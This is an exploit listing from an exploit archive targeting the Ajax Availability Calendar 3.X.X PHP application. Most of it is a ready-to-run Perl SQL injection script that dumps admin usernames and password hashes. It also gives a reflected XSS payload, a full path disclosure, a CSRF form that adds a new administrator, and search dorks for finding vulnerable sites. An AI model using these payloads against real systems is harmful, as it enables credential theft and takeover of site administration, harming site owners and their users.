Ajax Availability Calendar 3.X.X Multiple Vulnerabilties

2013-05-12T00:00:00
ID 1337DAY-ID-20762
Type zdt
Reporter AtT4CKxT3rR0r1ST
Modified 2013-05-12T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Ajax Availability Calendar 3.X.X Multiple Vulnerabilties
==============================================================
 
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [[email protected]]
.:. Script         : http://www.ajaxavailabilitycalendar.com/
.:. Dork           : intitle:"Ajax Availability Calendar"   ,   inurl:"/ac-admin/index.php"
####################################################################
===[ Exploit ]===

Sql Injection:
==============
#!/usr/bin/perl -w

# Ajax Availability Calendar 3.X.X Remote SQL Injection Vulnerability
# Author      : AtT4CKxT3rR0r1ST 
# Contact     : [email protected]
# Script      : http://www.ajaxavailabilitycalendar.com/
# Admin Panel : www.site.com/ac-admin/
sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
clear();
print "|----------------------------------------------------|\n";
print "|          'Ajax Availability Calendar 3.X.X'        |\n";
print "| Coded by   : AtT4CKxT3rR0r1ST                      |\n";
print "|----------------------------------------------------|\n";
use LWP::UserAgent;
print "\nInsert Target:";
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress...\n";
print "\n";
#Nama Column
$Column="group_concat(username,0x3a,password)";
#Nama Table
$table="bookings_admin_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "?id_item=null and 1=2 union select ".$Column."+from/**/".$table."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/:(.*):([0-9a-fA-F]{32})/){
print "\n[+] Admin User : $1\n";
}if($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n";
print "[+] Success !!\n";

}



else{print "[-] Unable To Get The Information...\n";
}


Reflected XSS:
==============

www.site.com/?id_item='"--></style></script><script>alert(0x000581)</script>


Full Path Disclosure:
====================

www.site.com/ac-includes/common.inc.php


CSRF:
=====
[Add Admin]
-------------

<form method="POST" name="form0" action="http://www.site.com/ac-admin/index.php?page=admin_users&action=new">
<input type="hidden" name="add[username]" value="admin"/>
<input type="hidden" name="password" value="Palestine"/>
<input type="hidden" name="password2" value="Palestine"/>
</form>

</body>
</html>
####################################################################

#  0day.today [2018-02-19]  #